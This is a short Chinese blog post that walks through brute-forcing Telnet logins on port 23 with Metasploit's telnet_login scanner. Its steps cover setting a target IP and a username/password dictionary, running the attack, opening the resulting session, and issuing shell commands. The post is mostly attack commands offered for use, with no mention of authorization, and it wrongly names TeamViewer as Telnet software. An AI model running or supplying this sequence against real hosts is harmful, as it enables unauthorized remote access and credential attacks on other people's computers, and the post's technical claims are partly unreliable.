Telnet可以理解为TCP是提供远程操控的端口windows默认是关闭状态需要自己打开连接. 而且它为用户提供了在本地计算机上完成远程主机工作的能力所以就算不存在同一网络(Local Network)也能操控你的计算机. 最出名的软件就是Team viewer.
1.老规矩扫描目标的23端口获取详细信息.
#msfconsole
3.寻找telnet的Payload, 你可以选择你要使用的payload.
4.这次我们也使用最简单的方式也就是用户密码爆破.
调用Payload和查看Payload信息.
> use auxiliary/scanner/telnet/telnet_login
>show options
5.创建一个字典, 大概长这样.
[Username] [Password]
6.设定你的目标IP地址和使用的字典.
> set RHOSTS [目标IP地址]
> set USERPASS_FILE [字典的路径]
7.攻击, 它会一个一个的去对字典里面的Username和Password看正不正确, 如果正确就会出现一个sessions 1 opened.
>exploit
8.显示已连接用户, sessions 1 就是 id 1所以对了.
> sessions -l
9. 连接该用户.
> sessions -i [id号码]
10.尝试输入shell指令, GET.
$ ifconfig (显示网络配置)
11. 输入退出指令2次就可以完全退出了.
$ exit
> exit
感谢阅读
No comments:
Post a Comment